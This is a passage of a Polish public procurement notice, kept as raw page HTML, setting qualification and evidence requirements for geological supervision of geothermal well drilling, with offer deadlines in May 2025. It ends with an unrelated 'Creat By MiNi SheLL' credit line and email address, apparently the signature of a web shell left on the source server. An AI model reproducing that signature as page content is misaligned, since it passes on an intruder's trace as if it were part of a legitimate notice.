sprawującą nadzór geologiczny, która posiada kwalifikacje geologiczne kategorii IV zgodnie z wymogami wynikającymi z ustawy z dnia 9 czerwca 2011 r. prawo geologiczne i górnicze (Dz. U. 2024 poz. 1290 ze zm.) potwierdzone świadectwem stwierdzającym kwalifikacje do wykonywania, dozorowania i kierowania pracami geologicznymi oraz posiada doświadczenie w sprawowaniu nadzoru geologicznego podczas wiercenia minimum 1 otworu geotermalnego o głębokości minimum1000 m p.p.t. oraz jest autorem zatwierdzonej dokumentacji hydrogeologicznej dla tego otworu,<br/>3)	czterema osobami sprawującymi dozór geologiczny, z których każda posiada kwalifikacje geologiczne kategorii IV lub XIII, zgodnie z wymogami wynikającymi z przepisów prawa geologicznego i górniczego, potwierdzone świadectwem stwierdzającym kwalifikacje do wykonywania, dozorowania i kierowania pracami geologicznymi oraz posiada doświadczenie zdobyte podczas dozorowania minimum 1 otworu geotermalnego o głębokości minimum 1000 m p.p.t.<br/>Doświadczenie personelu musi zostać potwierdzone referencjami od Zamawiającego, dla którego zamówienie było wykonywane lub innymi dokumentami, z których jasno będzie wynikało, że personel posiada doświadczenie w tym zakresie.<br/>Zamawiający nie dopuszcza łączenia wyżej wskazanych funkcji w zakresie uprawnień i doświadczenia tj. nie dopuszcza, aby jedna osoba sprawowała więcej niż jedną funkcję w trakcie realizacji zadania stanowiącego przedmiot zamówienia w niniejszym postepowaniu.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, a także w przypadku, gdy wykonawca polega na zdolnościach technicznych lub zawodowych innego podmiotu, w odniesieniu do warunków określonych powyżej winien wykazać się przynajmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia lub podmiot na którego zdolnościach technicznych lub zawodowych Wykonawca będzie polegał. <br/>Wszystkie osoby oddelegowane do realizacji zadania powinny posługiwać się językiem polskim lub Wykonawca na czas realizacji zamówienia zapewni tłumacza. <br/>UWAGA! Pod pojęciem „otwór geotermalny” należy rozumieć otwór wiertniczy wykonany w celu wydobywania bądź zatłaczania wód podziemnych, z którego eksploatowana woda ma ustabilizowaną temperaturę na wypływie nie mniejszą niż 20oC, którego zasoby są ustalone w zatwierdzonej dokumentacji hydrogeologicznej.<br/>Przez jedną usługę (np. sprawowania nadzoru, dozoru czy sporządzania określonego rodzaju dokumentacji) należy rozumieć wykonanie usługi na rzecz jednego zleceniodawcy na podstawie jednej umowy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>a)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu osób stanowi załącznik nr 6 do SWZ <br/>b)	wykazu usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty wzór wykazu wykonanych robót stanowi załącznik nr 7 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Oferta powinna być podpisana przez ustanowionego pełnomocnika. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców (członków konsorcjum, wspólników spółki cywilnej). Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (załącznik nr 4 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Opisane w rozdziale XXII SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://radoszyce.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-12 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com